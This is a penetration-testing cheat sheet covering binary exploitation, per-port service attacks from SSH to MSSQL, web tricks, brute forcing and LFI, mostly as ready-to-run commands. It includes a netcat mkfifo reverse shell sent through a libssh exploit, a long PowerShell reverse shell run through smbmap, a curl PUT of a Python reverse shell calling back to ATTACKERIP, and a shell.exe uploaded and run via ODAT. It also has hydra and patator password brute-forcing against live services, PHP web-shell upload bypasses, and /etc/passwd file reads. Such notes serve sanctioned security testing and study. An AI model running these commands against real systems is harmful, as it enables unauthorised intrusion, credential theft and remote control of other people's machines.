|   %rax  | %rdi | %rsi | %rdx | %r10 | %r8  | %r9  |

EXAMPLE
------------------------------------------

from pwn import *

# Set up pwntools to work with this binary
elf = context.binary = ELF('ret2win')
io = process(elf.path) 
gdb.attach(io)
info("%#x target", elf.symbols.ret2win)

ret2win = p64(elf.symbols["ret2win"])
payload = "A"*40 + ret2win
io.sendline(payload)
io.recvuntil("Here's your flag:")

# Get our flag!
flag = io.recvall()
success(flag)

Burp

- If Render Page crash:
sudo sysctl -w kernel.unprivileged_userns_clone=1

- Scope with all subdomains:
.*\.test\.com$

- Use Intruder to target specific parameters for scanning 
  - Right click: actively scan defined insertion points 

# Autorize Plugin
1. Login with lower user, get the cookie or token and paste in header inside Configuration tab.
2. In second browser, login with higher privilege user and start intercepting the requests of privilged functionality like admin-panel

# Configuration
- Project Options -> HTTP -> Redirections -> Enable JavaScript-driven
- User Options -> Misc -> Proxy Interception -> Always disabled
- Target -> Site Map -> Show all && Show only in-scope items

Extender plugins/bapps

Dictionary creation

Default creds:
https://cirt.net/passwords
https://github.com/danielmiessler/SecLists/tree/master/Passwords/Default-Credentials
https://github.com/LandGrey/pydictor
https://github.com/Mebus/cupp
https://github.com/sc0tfree/mentalist

Java jar

Task    -    Command
Execute Jar    -    java -jar [jar]
Unzip Jar    -    unzip -d [output directory] [jar]
Create Jar    -    jar -cmf META-INF/MANIFEST.MF [output jar] *
Base64 SHA256    -    sha256sum [file] | cut -d' ' -f1 | xxd -r -p | base64
Remove Signing    -    rm META-INF/*.SF META-INF/*.RSA META-INF/*.DSA
Delete from Jar    -    zip -d [jar] [file to remove]
Decompile class    -    procyon -o . [path to class]
Decompile Jar    -    procyon -jar [jar] -o [output directory]
Compile class    -    javac [path to .java file]

Tools stuff

https://tools.tldr.run/

description: Find attack vectors in your victim

Enumeration

File analysis File analysis.
Ports Ports.

• Web.
  Web Service Web services.
  Cloud Cloud.
  AWS AWS.
  Azure Azure.
  OSINT OSINT Cloud.
  Docker/Kubernets Docker/Kubernetes.
  CDN CDN.

description: Analyzing different types of files

Files

Common

# Check real file type
file file.xxx

# Analyze strings
strings file.xxx
strings -a -n 15 file.xxx # Check the entire file and outputs strings longer than 15 chars

# Check embedded files
binwalk file.xxx # Check
binwalk -e file.xxx # Extract

# Check as binary file in hex
ghex file.xxx

# Check metadata
exiftool file.xxx

# Stego tool for multiple formats
wget https://embeddedsw.net/zip/OpenPuff_release.zip
unzip OpenPuff_release.zip -d ./OpenPuff
wine OpenPuff/OpenPuff_release/OpenPuff.exe

# Compressed files
fcrackzip file.zip

# Office documents
https://github.com/assafmo/xioc

Disk files

# guestmount can mount any kind of disk file
sudo apt-get install libguestfs-tools
guestmount --add yourVirtualDisk.vhdx --inspector --ro /mnt/anydirectory

Audio

# Check spectrogram
wget https://code.soundsoftware.ac.uk/attachments/download/2561/sonic-visualiser_4.0_amd64.deb
dpkg -i sonic-visualiser_4.0_amd64.deb

# Check for Stego
hideme stego.mp3 -f && cat output.txt #AudioStego

Images

# Stego
wget http://www.caesum.com/handbook/Stegsolve.jar -O stegsolve.jar
chmod +x stegsolve.jar
java -jar stegsolve.jar

# Stegpy
stegpy -p file.png

# Check png corrupted
pngcheck -v image.jpeg

# Check what kind of image is
identify -verbose image.jpeg

Ports

General

AIO Penetration Testing Methodology - 0DAYsecurity.com

# Responder
responder -I [Interface] -A
responder -I [Interface] -i [IP Address] or -e [External IP] -A

# Make changes to config to turn off services:
nano /usr/share/responder/Responder.conf

# Check for systems with SMB Signing not enabled
python3 RunFinger.py -i 172.21.0.0/24

Port 21 - FTP

nmap --script ftp-anon,ftp-bounce,ftp-libopie,ftp-proftpd-backdoor,ftp-vsftpd-backdoor,ftp-vuln-cve2010-4221,tftp-enum -p 21 10.11.1.111

Port 22 - SSH

• If you have usernames test login with username:username
• Vulnerable Versions to user enum: <7.7

# User can ask to execute a command right after authentication before it’s default command or shell is executed

$ ssh -v user@10.10.1.111 id
...
Password:
debug1: Authentication succeeded (keyboard-interactive).
Authenticated to 10.10.1.111 ([10.10.1.1114]:22).
debug1: channel 0: new [client-session]
debug1: Requesting no-more-sessions@openssh.com
debug1: Entering interactive session.
debug1: pledge: network
debug1: client_input_global_request: rtype hostkeys-00@openssh.com want_reply 0
debug1: Sending command: id
debug1: client_input_channel_req: channel 0 rtype exit-status reply 0
debug1: client_input_channel_req: channel 0 rtype eow@openssh.com reply 0
uid=1000(user) gid=100(users) groups=100(users)
debug1: channel 0: free: client-session, nchannels 1
Transferred: sent 2412, received 2480 bytes, in 0.1 seconds
Bytes per second: sent 43133.4, received 44349.5
debug1: Exit status 0

Check Auth Methods:

$ ssh -v 10.10.1.111
OpenSSH_8.1p1, OpenSSL 1.1.1d  10 Sep 2019
...
debug1: Authentications that can continue: publickey,password,keyboard-interactive

Force Auth Method:

$ ssh -v 10.10.1.111 -o PreferredAuthentications=password
...
debug1: Next authentication method: password

BruteForce:

patator ssh_login host=10.11.1.111 port=22 user=root 0=/usr/share/metasploit-framework/data/wordlists/unix_passwords.txt password=FILE0 -x ignore:mesg='Authentication failed.'
hydra -l user -P /usr/share/wordlists/password/rockyou.txt -e s ssh://10.10.1.111
medusa -h 10.10.1.111 -u user -P /usr/share/wordlists/password/rockyou.txt -e s -M ssh
ncrack --user user -P /usr/share/wordlists/password/rockyou.txt ssh://10.10.1.111

LibSSH Before 0.7.6 and 0.8.4 - LibSSH 0.7.6 / 0.8.4 - Unauthorized Access 
Id
python /usr/share/exploitdb/exploits/linux/remote/46307.py 10.10.1.111 22 id
Reverse
python /usr/share/exploitdb/exploits/linux/remote/46307.py 10.10.1.111 22 "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.1.111 80 >/tmp/f"

SSH FUZZ
https://dl.packetstormsecurity.net/fuzzer/sshfuzz.txt

cpan Net::SSH2
./sshfuzz.pl -H 10.10.1.111 -P 22 -u user -p user

use auxiliary/fuzzers/ssh/ssh_version_2

SSH-AUDIT
https://github.com/arthepsy/ssh-audit

• https://www.exploit-db.com/exploits/18557 ~ Sysax 5.53 – SSH ‘Username’ Remote Buffer Overflow
• https://www.exploit-db.com/exploits/45001 ~ OpenSSH < 6.6 SFTP – Command Execution                             
• https://www.exploit-db.com/exploits/45233 ~ OpenSSH 2.3 < 7.7 – Username Enumeration                             
• https://www.exploit-db.com/exploits/46516 ~ OpenSSH SCP Client – Write Arbitrary Files                             

http://www.vegardno.net/2017/03/fuzzing-openssh-daemon-using-afl.html

# Enum users < 7.7:
https://www.exploit-db.com/exploits/45233
python ssh_user_enum.py --port 2223 --userList /root/Downloads/users.txt IP 2>/dev/null | grep "is a"

# SSH Leaks:
https://shhgit.darkport.co.uk/

Port 23 - Telnet

# Get banner
telnet 10.11.1.110
# Bruteforce password
patator telnet_login host=10.11.1.110 inputs='FILE0\nFILE1' 0=/root/Desktop/user.txt 1=/root/Desktop/pass.txt  persistent=0 prompt_re='Username: | Password:'

Port 25 - SMTP

nc -nvv 10.11.1.111 25
HELO foo

telnet 10.11.1.111 25
VRFY root

nmap --script=smtp-commands,smtp-enum-users,smtp-vuln-cve2010-4344,smtp-vuln-cve2011-1720,smtp-vuln-cve2011-1764 -p 25 10.11.1.111
smtp-user-enum -M VRFY -U /root/sectools/SecLists/Usernames/Names/names.txt -t 10.11.1.111

Send email unauth:

MAIL FROM:admin@admin.com
RCPT TO:DestinationEmail@DestinationDomain.com
DATA
test

.

Receive:
250 OK

Port 53 - DNS

dig axfr @IP
dnsrecon -d domain -t axfr
fierce -dns domain.com

Port 69 - UDP - TFTP

• Vulns tftp in server 1.3, 1.4, 1.9, 2.1, and a few more.
• Checks of FTP Port 21.

nmap -p69 --script=tftp-enum.nse 10.11.1.111

Port 88 - Kerberos

nmap -p 88 --script=krb5-enum-users --script-args="krb5-enum-users.realm='DOMAIN.LOCAL'" IP
use auxiliary/gather/kerberos_enumusers # MSF

# Check for Kerberoasting: 
GetNPUsers.py DOMAIN-Target/ -usersfile user.txt -dc-ip <IP> -format hashcat/john

# GetUserSPNs
ASREPRoast:
impacket-GetUserSPNs <domain_name>/<domain_user>:<domain_user_password> -request -format <AS_REP_responses_format [hashcat | john]> -outputfile <output_AS_REP_responses_file>
impacket-GetUserSPNs <domain_name>/ -usersfile <users_file> -format <AS_REP_responses_format [hashcat | john]> -outputfile <output_AS_REP_responses_file>

Kerberoasting: 
impacket-GetUserSPNs <domain_name>/<domain_user>:<domain_user_password> -outputfile <output_TGSs_file> 

Overpass The Hash/Pass The Key (PTK):
python3 getTGT.py <domain_name>/<user_name> -hashes [lm_hash]:<ntlm_hash>
python3 getTGT.py <domain_name>/<user_name> -aesKey <aes_key>
python3 getTGT.py <domain_name>/<user_name>:[password]

# Using TGT key to excute remote commands from the following impacket scripts:

python3 psexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
python3 smbexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
python3 wmiexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass

https://www.tarlogic.com/blog/como-funciona-kerberos/
https://www.tarlogic.com/blog/como-atacar-kerberos/

python kerbrute.py -dc-ip IP -users /root/htb/kb_users.txt -passwords /root/pass_common_plus.txt -threads 20 -domain DOMAIN -outputfile kb_extracted_passwords.txt

https://blog.stealthbits.com/extracting-service-account-passwords-with-kerberoasting/
https://github.com/GhostPack/Rubeus
https://github.com/fireeye/SSSDKCMExtractor

Port 110 - Pop3

telnet 10.11.1.111
USER pelle@10.11.1.111
PASS admin

or:

USER pelle
PASS admin

# List all emails
list

# Retrieve email number 5, for example
retr 9

Port 111 - Rpcbind

rpcinfo -p 10.11.1.111
rpcclient -U "" 10.11.1.111
    srvinfo
    enumdomusers
    getdompwinfo
    querydominfo
    netshareenum
    netshareenumall

Port 135 - MSRPC

Some versions are vulnerable.

nmap 10.11.1.111 --script=msrpc-enum
msf > use exploit/windows/dcerpc/ms03_026_dcom

Port 139/445 - SMB

# Enum hostname
enum4linux -n 10.11.1.111
nmblookup -A 10.11.1.111
nmap --script=smb-enum* --script-args=unsafe=1 -T5 10.11.1.111

# Get Version
smbver.sh 10.11.1.111
Msfconsole;use scanner/smb/smb_version
ngrep -i -d tap0 's.?a.?m.?b.?a.*[[:digit:]]' 
smbclient -L \\\\10.11.1.111

# Get Shares
smbmap -H  10.11.1.111 -R 
echo exit | smbclient -L \\\\10.11.1.111
smbclient \\\\10.11.1.111\\
smbclient -L //10.11.1.111 -N
nmap --script smb-enum-shares -p139,445 -T4 -Pn 10.11.1.111
smbclient -L \\\\10.11.1.111\\

# Check null sessions
smbmap -H 10.11.1.111
rpcclient -U "" -N 10.11.1.111
smbclient //10.11.1.111/IPC$ -N

# Exploit null sessions
enum -s 10.11.1.111
enum -U 10.11.1.111
enum -P 10.11.1.111
enum4linux -a 10.11.1.111
/usr/share/doc/python3-impacket/examples/samrdump.py 10.11.1.111

# Connect to username shares
smbclient //10.11.1.111/share -U username

# Connect to share anonymously
smbclient \\\\10.11.1.111\\
smbclient //10.11.1.111/
smbclient //10.11.1.111/
smbclient //10.11.1.111/<""share name"">
rpcclient -U " " 10.11.1.111
rpcclient -U " " -N 10.11.1.111

# Check vulns
nmap --script smb-vuln* -p139,445 -T4 -Pn 10.11.1.111

# Check common security concerns
msfconsole -r /usr/share/metasploit-framwork/scripts/resource/smb_checks.rc

# Extra validation
msfconsole -r /usr/share/metasploit-framwork/scripts/resource/smb_validate.rc

# Multi exploits
msfconsole; use exploit/multi/samba/usermap_script; set lhost 192.168.0.X; set rhost 10.11.1.111; run

# Bruteforce login
medusa -h 10.11.1.111 -u userhere -P /usr/share/seclists/Passwords/Common-Credentials/10k-most-common.txt -M smbnt 
nmap -p445 --script smb-brute --script-args userdb=userfilehere,passdb=/usr/share/seclists/Passwords/Common-Credentials/10-million-password-list-top-1000000.txt 10.11.1.111  -vvvv
nmap –script smb-brute 10.11.1.111

# nmap smb enum & vuln 
nmap --script smb-enum-*,smb-vuln-*,smb-ls.nse,smb-mbenum.nse,smb-os-discovery.nse,smb-print-text.nse,smb-psexec.nse,smb-security-mode.nse,smb-server-stats.nse,smb-system-info.nse,smb-protocols -p 139,445 10.11.1.111
nmap --script smb-enum-domains.nse,smb-enum-groups.nse,smb-enum-processes.nse,smb-enum-sessions.nse,smb-enum-shares.nse,smb-enum-users.nse,smb-ls.nse,smb-mbenum.nse,smb-os-discovery.nse,smb-print-text.nse,smb-psexec.nse,smb-security-mode.nse,smb-server-stats.nse,smb-system-info.nse,smb-vuln-conficker.nse,smb-vuln-cve2009-3103.nse,smb-vuln-ms06-025.nse,smb-vuln-ms07-029.nse,smb-vuln-ms08-067.nse,smb-vuln-ms10-054.nse,smb-vuln-ms10-061.nse,smb-vuln-regsvc-dos.nse -p 139,445 10.11.1.111

# Mount smb volume linux
mount -t cifs -o username=user,password=password //x.x.x.x/share /mnt/share

# rpcclient commands
rpcclient -U "" 10.11.1.111
    srvinfo
    enumdomusers
    getdompwinfo
    querydominfo
    netshareenum
    netshareenumall

# Run cmd over smb from linux
winexe -U username //10.11.1.111 "cmd.exe" --system

# smbmap
smbmap.py -H 10.11.1.111 -u administrator -p asdf1234 #Enum
smbmap.py -u username -p 'P@$$w0rd1234!' -d DOMAINNAME -x 'net group "Domain Admins" /domain' -H 10.11.1.111 #RCE
smbmap.py -H 10.11.1.111 -u username -p 'P@$$w0rd1234!' -L # Drive Listing
smbmap.py -u username -p 'P@$$w0rd1234!' -d ABC -H 10.11.1.111 -x 'powershell -command "function ReverseShellClean {if ($c.Connected -eq $true) {$c.Close()}; if ($p.ExitCode -ne $null) {$p.Close()}; exit; };$a=""""192.168.0.X""""; $port=""""4445"""";$c=New-Object system.net.sockets.tcpclient;$c.connect($a,$port) ;$s=$c.GetStream();$nb=New-Object System.Byte[] $c.ReceiveBufferSize  ;$p=New-Object System.Diagnostics.Process  ;$p.StartInfo.FileName=""""cmd.exe""""  ;$p.StartInfo.RedirectStandardInput=1  ;$p.StartInfo.RedirectStandardOutput=1;$p.StartInfo.UseShellExecute=0  ;$p.Start()  ;$is=$p.StandardInput  ;$os=$p.StandardOutput  ;Start-Sleep 1  ;$e=new-object System.Text.AsciiEncoding  ;while($os.Peek() -ne -1){$out += $e.GetString($os.Read())} $s.Write($e.GetBytes($out),0,$out.Length)  ;$out=$null;$done=$false;while (-not $done) {if ($c.Connected -ne $true) {cleanup} $pos=0;$i=1; while (($i -gt 0) -and ($pos -lt $nb.Length)) { $read=$s.Read($nb,$pos,$nb.Length - $pos); $pos+=$read;if ($pos -and ($nb[0..$($pos-1)] -contains 10)) {break}}  if ($pos -gt 0){ $string=$e.GetString($nb,0,$pos); $is.write($string); start-sleep 1; if ($p.ExitCode -ne $null) {ReverseShellClean} else {  $out=$e.GetString($os.Read());while($os.Peek() -ne -1){ $out += $e.GetString($os.Read());if ($out -eq $string) {$out="""" """"}}  $s.Write($e.GetBytes($out),0,$out.length); $out=$null; $string=$null}} else {ReverseShellClean}};"' # Reverse Shell

# Check
\Policies\{REG}\MACHINE\Preferences\Groups\Groups.xml look for user&pass "gpp-decrypt "

# CrackMapExec
crackmapexec smb 10.55.100.0/23 -u LA-ITAdmin -H 573f6308519b3df23d9ae2137f549b15 --local
crackmapexec smb 10.55.100.0/23 -u LA-ITAdmin -H 573f6308519b3df23d9ae2137f549b15 --local --lsa

# Impacket
python3 samdump.py SMB 172.21.0.0

Port 161/162 UDP - SNMP

nmap -vv -sV -sU -Pn -p 161,162 --script=snmp-netstat,snmp-processes 10.11.1.111
nmap 10.11.1.111 -Pn -sU -p 161 --script=snmp-brute,snmp-hh3c-logins,snmp-info,snmp-interfaces,snmp-ios-config,snmp-netstat,snmp-processes,snmp-sysdescr,snmp-win32-services,snmp-win32-shares,snmp-win32-software,snmp-win32-users
snmp-check 10.11.1.111 -c public|private|community
snmpwalk -c public -v1 ipaddress 1
snmpwalk -c private -v1 ipaddress 1
snmpwalk -c manager -v1 ipaddress 1
onesixtyone -c /usr/share/doc/onesixtyone/dict.txt 172.21.0.X
# Impacket
python3 samdump.py SNMP 172.21.0.0 

# MSF aux modules
 auxiliary/scanner/misc/oki_scanner                                    
 auxiliary/scanner/snmp/aix_version                                   
 auxiliary/scanner/snmp/arris_dg950                                   
 auxiliary/scanner/snmp/brocade_enumhash                               
 auxiliary/scanner/snmp/cisco_config_tftp                               
 auxiliary/scanner/snmp/cisco_upload_file                              
 auxiliary/scanner/snmp/cnpilot_r_snmp_loot                             
 auxiliary/scanner/snmp/epmp1000_snmp_loot                             
 auxiliary/scanner/snmp/netopia_enum                                    
 auxiliary/scanner/snmp/sbg6580_enum                                 
 auxiliary/scanner/snmp/snmp_enum                                 
 auxiliary/scanner/snmp/snmp_enum_hp_laserjet                           
 auxiliary/scanner/snmp/snmp_enumshares                                
 auxiliary/scanner/snmp/snmp_enumusers                                 
 auxiliary/scanner/snmp/snmp_login

Port 389,636 - LDAP

jxplorer
ldapsearch -h 10.11.1.111 -p 389 -x -b "dc=mywebsite,dc=com"
python3 windapsearch.py --dc-ip 10.10.10.182 --users --full > windapsearch_users.txt
cat windapsearch_users.txt | grep sAMAccountName | cut -d " " -f 2 > users.txt

Port 443 - HTTPS

Read the actual SSL CERT to:

• find out potential correct vhost to GET
• is the clock skewed
• any names that could be usernames for bruteforce/guessing.

./testssl.sh -e -E -f -p  -S -P -c -H -U TARGET-HOST > OUTPUT-FILE.html
# Check for mod_ssl,OpenSSL version Openfuck

Port 500 - ISAKMP IKE

ike-scan 10.11.1.111

Port 513 - Rlogin

apt install rsh-client
rlogin -l root 10.11.1.111

Port 541 - FortiNet SSLVPN

Fortinet Ports Guide

SSL VPN Leak

Port 1433 - MSSQL

nmap -p 1433 -sU --script=ms-sql-info.nse 10.11.1.111
use auxiliary/scanner/mssql/mssql_ping
use auxiliary/scanner/mssql/mssql_login
use exploit/windows/mssql/mssql_payload
sqsh -S 10.11.1.111 -U sa
    xp_cmdshell 'date'
      go


EXEC sp_execute_external_script @language = N'Python', @script = N'import os;os.system("whoami")'

https://blog.netspi.com/hacking-sql-server-procedures-part-4-enumerating-domain-accounts/

Port 1521 - Oracle

oscanner -s 10.11.1.111 -P 1521
tnscmd10g version -h 10.11.1.111
tnscmd10g status -h 10.11.1.111
nmap -p 1521 -A 10.11.1.111
nmap -p 1521 --script=oracle-tns-version,oracle-sid-brute,oracle-brute
MSF: good modules under auxiliary/admin/oracle and scanner/oracle

./odat-libc2.5-i686 all -s 10.11.1.111 -p 1521
./odat-libc2.5-i686 sidguesser -s 10.11.1.111 -p 1521
./odat-libc2.5-i686 passwordguesser -s 10.11.1.111 -p 1521 -d XE

Upload reverse shell with ODAT:
./odat-libc2.5-i686 utlfile -s 10.11.1.111 -p 1521 -U scott -P tiger -d XE --sysdba --putFile c:/ shell.exe /root/shell.exe

and run it:
./odat-libc2.5-i686 externaltable -s 10.11.1.111 -p 1521 -U scott -P tiger -d XE --sysdba --exec c:/ shell.exe

Port 2000 - Cisco sccp

# cisco-audit-tool
CAT -h ip -p 2000

Port 2049 - NFS

showmount -e 10.11.1.111

# If you find anything you can mount it like this:

mount 10.11.1.111:/ /tmp/NFS
mount -t 10.11.1.111:/ /tmp/NFS

Port 2100 - Oracle XML DB

Default passwords:

https://docs.oracle.com/cd/B10501_01/win.920/a95490/username.htm

Port 3306 - MySQL

nmap --script=mysql-databases.nse,mysql-empty-password.nse,mysql-enum.nse,mysql-info.nse,mysql-variables.nse,mysql-vuln-cve2012-2122.nse 10.11.1.111 -p 3306

mysql --host=10.11.1.111 -u root -p

MYSQL UDF 
https://www.adampalmer.me/iodigitalsec/2013/08/13/mysql-root-to-system-root-with-udf-for-windows-and-linux/

Port 3389 - RDP

nmap -p 3389 --script=rdp-vuln-ms12-020.nse
rdesktop -u username -p password -g 85% -r disk:share=/root/ 10.11.1.111
rdesktop -u guest -p guest 10.11.1.111 -g 94%
ncrack -vv --user Administrator -P /root/oscp/passwords.txt rdp://10.11.1.111
python crowbar.py -b rdp -s 10.11.1.111/32 -u admin -C ../rockyou.txt -v

Port 5900 - VNC

nmap --script=vnc-info,vnc-brute,vnc-title -p 5900 10.11.1.111

Port 5985 - WinRM

https://github.com/Hackplayers/evil-winrm
gem install evil-winrm
evil-winrm -i 10.11.1.111 -u Administrator -p 'password1'
evil-winrm -i 10.11.1.111 -u Administrator -H 'hash-pass' -s /scripts/folder

Port 6379 - Redis

https://github.com/Avinash-acid/Redis-Server-Exploit
python redis.py 10.10.10.160 redis

Port 8172 - MsDeploy

Microsoft IIS Deploy port
IP:8172/msdeploy.axd

Unknown ports

• amap -d 10.11.1.111 8000
• netcat: makes connections to ports. Can echo strings or give shells: nc -nv 10.11.1.111 110
• sfuzz: can connect to ports, udp or tcp, refrain from closing a connection, using basic HTTP configurations

Try admin:admin, user:user

Web

Automatic web scanners

# https://github.com/skavngr/rapidscan
python2 rapidscan.py example.com
# finalRecon
sudo python3 finalrecon.py --full https://example.com
# sn1per
sn1per -t example.com
# nikto2 
nikto -h example.com

Quick tricks

- Web ports for nmap
80,81,300,443,591,593,832,981,1010,1311,1099,2082,2095,2096,2480,3000,3128,3333,4243,4567,4711,4712,4993,5000,5104,5108,5280,5281,5800,6543,7000,7396,7474,8000,8001,8008,8014,8042,8069,8080,8081,8083,8088,8090,8091,8118,8123,8172,8222,8243,8280,8281,8333,8337,8443,8500,8834,8880,8888,8983,9000,9043,9060,9080,9090,9091,9200,9443,9800,9981,10000,11371,12443,16080,18091,18092,20720,55672

- Check redirects
https://url.com/redirect/?url=http://twitter.com/
http://www.theirsite.com@yoursite.com/
http://www.yoursite.com/http://www.theirsite.com/
http://www.yoursite.com/folder/www.folder.com
/http://twitter.com/
/\\twitter.com
/\/twitter.com
?c=.twitter.com/
/?redir=google。com
//google%E3%80%82com
//google%00.com
# Remember url enconde the payloads!

- Retrieve additional info:
/favicon.ico/..%2f
/lol.png%23
/../../../
?debug=1
/server-status
/files/..%2f..%2f

- Bypass Rate Limits:
• Use different params: 
    sign-up, Sign-up, SignUp
• Use different headers:
    X-Originating-IP: 127.0.0.1
    X-Forwarded-For: 127.0.0.1
    X-Remote-IP: 127.0.0.1
    X-Remote-Addr: 127.0.0.1
    X-Forwarded-For: 192.168.0.21 (Local IP 2 times
• Null byte on params:
    %00, %0d%0a, %09, %0C, %20, %0

- Bypass upload restrictions:
• Change extension: .pHp3 or pHp3.jpg
• Modify mimetype: Content-type: image/jpeg
• Bypass getimagesize(): exiftool -Comment='"; system($_GET['cmd']); ?>' file.jpg
• Add gif header: GIF89a;
• All at the same time.

- ImageTragic (memory leaks in gif preview)
# https://github.com/neex/gifoeb
./gifoeb gen 512x512 dump.gif
# Upload dump.gif multiple times, check if preview changes.
# Check docs for exploiting

• If upload from web is allowed or :
https://medium.com/@shahjerry33/pixel-that-steals-data-im-invisible-3c938d4c3888
https://iplogger.org/invisible/
https://iplogger.org/15bZ87

• Mitigation : Proxy all the objects from third-party resources and create a CSP. Although this is only one way of mitigation, their could be many.

- Check HTTP options:
• Check if it is possible to upload
curl -v -X OPTIONS http://10.11.1.111/
• If put enabled, upload:
curl -v -X PUT -d '' http://10.11.1.111/test/shell.php
nmap -p 80 192.168.1.124 --script http-put --script-args http-put.url='/test/rootme.php',http-put.file='/root/php-reverse-shell.php'
curl -v -X PUT -d '' http://VICTIMIP/test/cmd.php && http://VICTIMIP/test/cmd.php?cmd=python%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%22ATTACKERIP%22,443));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);p=subprocess.call([%22/bin/sh%22,%22-i%22]);%27
curl -i -X PUT -H “Content-Type: text/plain; charset=utf-8” -d “/root/Desktop/meterpreter.php” http://VICTIMIP:8585/uploads/meterpreter.php
• If PUT is not allowed, try to override:
X-HTTP-Method -Override: PUT

- Discover hidden parameters
# https://github.com/maK-/parameth
python parameth.py -u https://example.com/test.php

- .DS_Store files?
# https://github.com/gehaxelt/Python-dsstore
python main.py samples/.DS_Store.ctf

- Polyglot RCE payload
1;sleep${IFS}9;#${IFS}’;sleep${IFS}9;#${IFS}”;sleep${IFS}9;#${IFS}

- Nmap web scan
nmap --script "http-*" example.com -p 443

- SQLi + XSS + SSTI
'"><svg/onload=prompt(5);>{{7*7}}
' ==> for Sql injection 
"><svg/onload=prompt(5);> ==> for XSS 
{{7*7}} ==> for SSTI/CSTI

Bruteforce

cewl
hash-identifier
john --rules --wordlist=/usr/share/wordlists/rockyou.txt unshadowed.txt
medusa -h 10.11.1.111 -u admin -P password-file.txt -M http -m DIR:/admin -T 10
ncrack -vv --user offsec -P password-file.txt rdp://10.11.1.111
crowbar -b rdp -s 10.11.1.111/32 -u victim -C /root/words.txt -n 1
patator http_fuzz url=https://10.10.10.10:3001/login method=POST accept_cookie=1 body='{"user":"admin","password":"FILE0","email":""}' 0=/root/acronim_dict.txt follow=1 -x ignore:fgrep='HTTP/2 422'
hydra -l root -P password-file.txt 10.11.1.111 ssh
hydra -P password-file.txt -v 10.11.1.111 snmp
hydra -l USERNAME -P /usr/share/wordlistsnmap.lst -f 10.11.1.111 ftp -V
hydra -l USERNAME -P /usr/share/wordlistsnmap.lst -f 10.11.1.111 pop3 -V
hydra -P /usr/share/wordlistsnmap.lst 10.11.1.111 smtp -V
hydra -L username.txt -p paswordl33t -t 4 ssh://10.10.1.111
hydra -L user.txt -P pass.txt 10.10.1.111 ftp

# PATATOR
patator http_fuzz url=https://10.10.10.10:3001/login method=POST accept_cookie=1 body='{"user":"admin","password":"FILE0","email":""}' 0=/root/acronim_dict.txt follow=1 -x ignore:fgrep='HTTP/2 422'

# SIMPLE LOGIN GET
hydra -L cewl_fin_50.txt -P cewl_fin_50.txt 10.11.1.111 http-get-form "/~login:username=^USER^&password=^PASS^&Login=Login:Unauthorized" -V

# GET FORM with HTTPS
hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.11.1.111 -s 443 -S https-get-form "/index.php:login=^USER^&password=^PASS^:Incorrect login/password\!"

# SIMPLE LOGIN POST
hydra -l root@localhost -P cewl 10.11.1.111 http-post-form "/otrs/index.pl:Action=Login&RequestedURL=&Lang=en&TimeOffset=-120&User=^USER^&Password=^PASS^:F=Login failed" -I

# API REST LOGIN POST
hydra -l admin -P /usr/share/wordlists/wfuzz/others/common_pass.txt -V -s 80 10.11.1.111 http-post-form "/centreon/api/index.php?action=authenticate:username=^USER^&password=^PASS^:Bad credentials" -t 64

# Password spraying bruteforcer
# https://github.com/x90skysn3k/brutespray
python brutespray.py --file nmap.gnmap -U /usr/share/wordlist/user.txt -P /usr/share/wordlist/pass.txt --threads 5 --hosts 5

Online dictionaries

https://www.cmd5.org/
http://hashes.org
https://www.onlinehashcrack.com/
https://gpuhash.me/
https://crackstation.net/
https://crack.sh/
https://hash.help/
https://passwordrecovery.io/
http://cracker.offensive-security.com/
https://md5decrypt.net/en/Sha256/
https://weakpass.com/wordlis

Crawl/Fuzz

# Crawlers
dirhunt https://url.com/
hakrawler -domain https://url.com/

# Fuzzers
# Best wordlists for fuzzing:
# https://github.com/danielmiessler/SecLists/tree/master/Discovery/Web-Content
    - raft-large-directories-lowercase.txt
    - directory-list-2.3-medium.txt
    - RobotsDisallowed/top10000.txt 

# ffuf
# Discover content
ffuf -recursion -c -e '.htm','.php','.html','.js','.txt','.zip','.bak','.asp','.aspx','.xml' -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories-lowercase.txt -u https://url.com/FUZZ
# Headers discover
ffuf -u https://hackxor.net -w /usr/share/SecLists/Discovery/Web-Content/BurpSuite-ParamMiner/both.txt -c -H "FUZZ: Hellothereheadertesting123 asd"
# Ffuf - burp
ffuf -replay-proxy http:127.0.0.1:8080

# Default login page
https://github.com/InfosecMatter/default-http-login-hunter
default-http-login-hunter.sh <URL>

# Dirsearch
dirsearch -r -f -u https://10.11.1.111 --extensions=htm,html,asp,aspx,txt -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories-lowercase.txt --request-by-hostname -t 40

# dirb
dirb http://10.11.1.111 -r -o dirb-10.11.1.111.txt

# wfuzz
wfuzz -c -z file,/usr/share/wfuzz/wordlist/general/common.txt --hc 404 http://10.11.1.11/FUZZ

# gobuster
gobuster dir -u http://10.11.1.111 -w /usr/share/seclists/Discovery/Web_Content/common.txt -s '200,204,301,302,307,403,500' -e
gobuster dir -e -u http://10.11.1.111/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
gobuster dir -u http://$10.11.1.111 -w /usr/share/seclists/Discovery/Web_Content/Top1000-RobotsDisallowed.txt
gobuster dir -e -u http://10.11.1.111/ -w /usr/share/wordlists/dirb/common.txt

LFI/RFI

# LFI
**Tool**
# https://github.com/kurobeats/fimap
fimap -u "http://10.11.1.111/example.php?test="
# https://github.com/P0cL4bs/Kadimus
./kadimus -u localhost/?pg=contact -A my_user_agent
# https://github.com/wireghoul/dotdotpwn
dotdotpwn.pl -m http -h 10.11.1.111 -M GET -o unix

# Basic LFI
curl -s http://10.11.1.111/gallery.php?page=/etc/passwd
# PHP Filter b64
http://10.11.1.111/index.php?page=php://filter/convert.base64-encode/resource=/etc/passwd && base64 -d savefile.php
http://10.11.1.111/index.php?m=php://filter/convert.base64-encode/resource=config
http://10.11.1.111/maliciousfile.txt%00?page=php://filter/convert.base64-encode/resource=../config.php
# Nullbyte ending
http://10.11.1.111/page=http://10.11.1.111/maliciousfile.txt%00
# Other techniques
https://abc.redact.com/static/%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c
